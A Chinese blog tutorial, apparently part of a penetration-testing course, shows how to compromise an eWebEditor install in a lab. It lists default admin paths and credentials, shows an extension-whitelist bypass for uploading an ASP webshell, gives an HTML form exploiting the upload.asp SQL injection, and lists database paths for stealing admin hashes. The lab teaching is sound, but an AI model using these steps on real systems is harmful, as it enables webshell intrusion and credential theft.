22-任意文件上传与编辑器漏洞(Ewebeditor、fckeditor、CKFinder、southidceditor等)(四)

已于 2024-06-22 19:31:54 修改
阅读量1k 收藏 13
点赞数 9
分类专栏: 渗透测试 文章标签: 编辑器 安全 网络 web 网络安全 web安全
于 2024-05-12 22:26:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42321190/article/details/138759016
版权

Ewebeditor编辑器漏洞

1、Ewebeditor编辑器介绍

Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!

2、eWebEditor编辑器搭建过程:

VM的Windows2003      eWebEditor_v216_Free   

打开IIS,新建网站:

c6732c9fddb94b02897553043aacfec7.png

设置网站本地ip地址及端口:

IP地址
10.0.0.101
端口
92

44c577f52e524be48cf77db7601b0623.png

  主目录路径:

C:\wwwtest\1111\wwwwtest\eWebEditor

2acab7b33ef34e67bacb538ee4e76761.png

 设置权限:

b7c06d393d9f40329b1a156433552900.png

搭建完成。

3、Ewebeditor利用核心

默认后台:www.xxxx.com/ewebeditor/admin_login.asp

默认数据库:ewebeditor/db/ewebeditor.mdb

默认账号密码:admin admin/admin888

4、利用过程

通常入侵ewebeditor编辑器的步骤如下:

1、首先访问默认管理页看是否存在

       默认管理页地址2.80以前为 ewebeditor/admin_login.asp

 以后版本为admin/login.asp(其他语言改后戳,这里以asp为例) 。

打开后台:

http://10.0.0.101:92/Admin_Login.asp

54df54a3d9734c7996cc2cb2570bd342.png

2、默认管理帐号密码

默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。

b66a272f3b584a30af49775496d8c7a5.png

25428c075dbd4a3f92cbcc2581de8854.png

样式管理--新建样式:

dce8b85d9cfb416ea1e334a46dd349ca.png

设置名称及添加照片类型:

(通过改照片类型方式上传文件绕过)

asp|cer|sas|aaspsp
## 因这几种类型默认可以被解析

c5bc8320f18847d1a6bc51df1fc20b7a.png

新建样式--工具栏--按钮设置--添加【插入或修改照片】按钮--保存设置

56e5ef8d73aa40aa8faa11501d5aa348.png

16c9a5f596564dfda0866c518aed125e.png

92d35690b4af4aac936647cd4e4a8c82.png

84556d0534ad4cf18c9ec222386e2d76.png

预览新建的样式:

622fc17074d64f08886a8094deafea3a.png

功能不能用,阅览器版本过高问题,切换到低版本正常使用:

53f96994b3ce4c52afdcfc1031374db4.png

 使用低版本阅览器打开新建的样式,预览,点图标上传:

上传文件:123.cer

2f967a4e26784ce896c15b4361dcc3d8.png

点击确定,webshell木马上传成功,之后,查看代码,就能看到完整的地址。

阅览器访问上传的文件,webshell木马被执行:

5aee95d48aa84f878ed57117accfba9f.png

可以远程操控目标主机了。

可以在在线平台查询eWebEditor相关漏洞及详细信息:

f24bdf36d1e246efa7e160db5578147b.png

如:eWebEditor 2.1.6 /upload.asp 文件上传漏洞

查找漏洞相关信息:

2f35c2df01b04dab9e0956de7af8d113.png

新建html文件,将代码粘贴到html文件中保存:

158bec5041c94aaa863d3a460dff5304.png

<form action="http://10.0.0.101:92/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

//将127.1/替换网站地址10.0.0.101:92

843a88e7247345dca12bc7c527554e80.png打开html文件进行上传 :

2d6adc635bf448118971b4c48a5241ea.png

上传成功之后,右击页面查看源代码:

18f705d2dd6543c6837f263c1397a767.png

找到上传后重命名文件名:

(发现没有文件路径只有重命名后的文件名,访问文件思路:1、根据报错法2、抓包工具相应包里查看(大部分没有)3、如果网站是开源的,下载源代码在本地虚拟机搭建相同环境复现漏洞,在虚拟机查找文件保存的目录。

2024512195912425.cer

35a904dd60c046759b8ca76a809ec13c.png

根据虚拟机搭建的网站查找文件名找到文件存放路径:

d36c87a5a6b14bc5897821c0202e6c7f.png

C:\wwwtest\1111\wwwwtest\eWebEditor\UploadFile
##C:\wwwtest\1111\wwwwtest\eWebEditor为网站根目录
##UploadFile文件存放目录
即http://10.0.0.101:92/UploadFile/2024512195912425.cer

271450aa80c1483dba4dc57cb0a53762.png

webshell木马执行成功。

3、默认数据库地址

如果密码不是默认的,我们访问的就不是默认数据库。尝试下载数据库得到管理员密码!管理员的帐号密码,都在eWebEditor_System表段里,sys_UserName Sys_UserPass 都是md5加密的。得到了加密密码。可以去www.cmd5.com www.xmd5.org 等网站进行查询

默认数据库路径为:
ewebeditor/db/ewebeditor.mdb 
常用数据库路径为:
ewebeditor/db/ewebeditor.asa 
ewebeditor/db/ewebeditor.asp
ewebeditor/db/#ewebeditor.asa 
ewebeditor/db/#ewebeditor.mdb
ewebeditor/db/ewebeditor.mdb
ewebeditor/db/!@#ewebeditor.asp 
ewebeditor/db/ewebeditor1033.mdb
......等等。

Xlbb.
关注
  • 9
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
ckfinder2上传绕过漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-20 1368
CKFinder 是国外一款非常流行的所见即所得文字编辑器,其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件。ckfinder2上传绕过漏洞CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传 8090sec_php;1.jpg 等畸形文件名,最终导致文件上传漏洞
文件上传与解析漏洞
Cou1d的博客
03-05 134
文件上传 漏洞银行 介绍: 由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP/ASP/JSP文件,并能够将这些文件传递给PHP/ASP/JSP解释器,就可以在远程服务器上执行任意脚本。 存在原因: 传文件的时候,如果服务器脚本语言,未对上传的文件进行严格的验证和过滤,就容易造成上传任意文件,包括上传脚本文件。 如果...
fckeditor漏洞_三十,文件上传漏洞编辑器漏洞和IIS高版本漏洞及防御
qq_50854662的博客
11-08 4829
fckeditor漏洞_三十,文件上传漏洞编辑器漏洞和IIS高版本漏洞及防御
22-任意文件上传编辑器漏洞Ewebeditor、fckeditorCKFinder、southidceditor等)(五)
最新发布
XLbb的博客
05-14 1299
其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。:升级编辑器,实施严格的文件上传策略,禁用IIS不安全的文件解析功能。
CKEditor 历史漏洞复现:CVE-2014-5191(无Poc)
soldi_er的博客
10-27 6947
文章目录选择测试版本 4.4.2安装 2015 年发布版本 4.4.2npm 安装 - 未成功bower 安装 - 成功页面引用 CKEditor寻找并测试漏洞 选择测试版本 4.4.2 根据官方公告的漏洞修复情况来看,第一个选择最好是 4.4.2。 安装 2015 年发布版本 4.4.2 npm 安装 - 未成功 访问 CKEditor 4 官方指南,查看 [Getting Started]模块。 新建 down-test 目录,测试不同命令的安装结果。 npm 安装命令 执行结果 npm
谈谈对后台登陆页面的渗透测试
mingyqf的博客
04-06 7065
谈谈对后台登陆页面的渗透测试 发布时间:2019-09-03 16:00:06 作者:yida223 ](https://p2.ssl.qhimg.com/t01143b6838054b2754.png) 0x00 前言 有些朋友在渗透时扫描到后台登陆界面,却不知道如何入手。最近刚好在某公司做渗透实习,对目标固定的系统渗透有些体会。因此这里讲一下对网站后台登陆界面的渗透思路,希望能为大家提供一些帮助。 0x01 开始 本人在进入登陆界面时,一般都是先用万能密码什么的测下输入框有没有注入(现在很少见了)。如果
iis服务器_win2003搭建iis服务器
weixin_39631953的博客
12-01 90
点击添加或删除角色点击下一步点击自定义配置然后直接下一步到底。然后再管理工具里面找到iis服务管理器右键网站然后点击新建点击下一步描述大家可以随便输入,这里是测试我就输入test网站IP地址输入本地的ip地址,主机头因为是本地搭建也可以输入本地ip此处路劲填写你要搭建的web网站文件夹的存放路径勾上前三个勾点击完成这个时候可以看到如下我们可以访问一下网站发现需要密码,因为按照我上述流程安装默认是打...
ewebeditor for php任意文件上传漏洞
weixin_34290000的博客
11-27 703
漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞。PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下: <?php $sUsername = "admin"; $sPassword = "admin"; $aStyle[1] = "gray|||gray|||office|...
CKFinder 1.4.3 任意文件上传漏洞
weixin_34252686的博客
04-24 3215
CKFinder 是国外一款非常流行的所见即所得文字编辑器,其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件。 CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传 8090sec_php;1.jpg 等畸形文件名,最终导致文件上传漏洞。   如图:     ...
ewebeditor编辑器漏洞
arissa666的博客
10-18 550
网页在线编辑器,权限限制不严格,弱口令,文件过滤出现问题。
CKFinderXSS漏洞
山兔的博客
02-23 532
可以把paylod语句输入到文件的后缀名当中,然后进行文件上传,后面在访问这个文件,就可以触发我们的payload语句。
网络空间安全赛题解析-通过CKFinder漏洞获取敏感信息
06-04
网络空间安全赛题工具
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor
10-28
EWebEditor漏洞信息没有在提供的内容中详细列出,但通常来说,网页编辑器可能存在的漏洞包括XSS(跨站脚本攻击)、CSRF(跨站请求伪造)以及文件上传漏洞等。攻击者可能利用这些漏洞在用户浏览器中执行恶意代码,...
15-编辑器漏洞1
08-03
编辑器漏洞通常出现在富文本编辑器(如FCKeditor)中,由于编辑器在处理文件上传时的安全控制不足,使得攻击者有机会上传任意文件。标题中的"15-编辑器漏洞1"指的是针对编辑器的某一种具体漏洞实例。 3. **编辑器...
30.文件上传漏洞编辑器漏洞和IIS高版本漏洞及防御(三)1
08-03
1. **FCKeditor编辑器漏洞**:FCKeditor是一款广泛使用的网页文本编辑器,但历史上曾出现过漏洞,允许攻击者通过编辑器上传恶意文件,从而可能执行任意代码。这种漏洞通常源于编辑器对上传文件类型的检查不足或解析...
eWebEditor 辑器按钮失效 IE8下eWebEditor编辑器无法使用的解决方法
10-29
最近我把IE浏览器更新到了IE8.0,在用eWebEditor在线HTML文本编辑器的时候点击eWebEditor上的所有编辑按钮都没用,只看到浏览器状态栏左下角显示网页上有错误,于是上网查了一下。终于找到解决的方法,测试后正常。
ewebeditor编辑器.rar
02-17
ACCESS数据库的后台管理编辑器 ======================================================================================================== eWebEditor ASP版,使用ACCESS配置数据库,带后台管理。为保证安全...
实战纪实 | 编辑器漏洞之Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 8915
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
小迪教程第十二天——编辑器漏洞
仲夏
10-22 902
1、目前网站采用编辑器有哪些?Ewebeditor(asp),fckeditor(asp/aspx),kindeditor(php),southidceditor,cfeditor(php)等2、ewebeditor编译器漏洞找后台地址,尝试默认帐号密码登录,添加上传类型,上传脚本文件获得网站权限(地址找不到,默认帐号密码被修改,无法添加上传类型)默认后台地址:ewebeditor/admin_lo
Web编辑器漏洞大全:从EWEBeditor到FCKeditor
主要涵盖了一系列常见的Web编辑器,如EWEBeditor、FCKeditor、Cuteditor、Freetextbox、Webhtmleditor、KindeditoreWebEditorNET、southidceditor、bigcneditor以及MsnEditor等的漏洞整理。手册版本为1.2,由北洋...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Xlbb.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值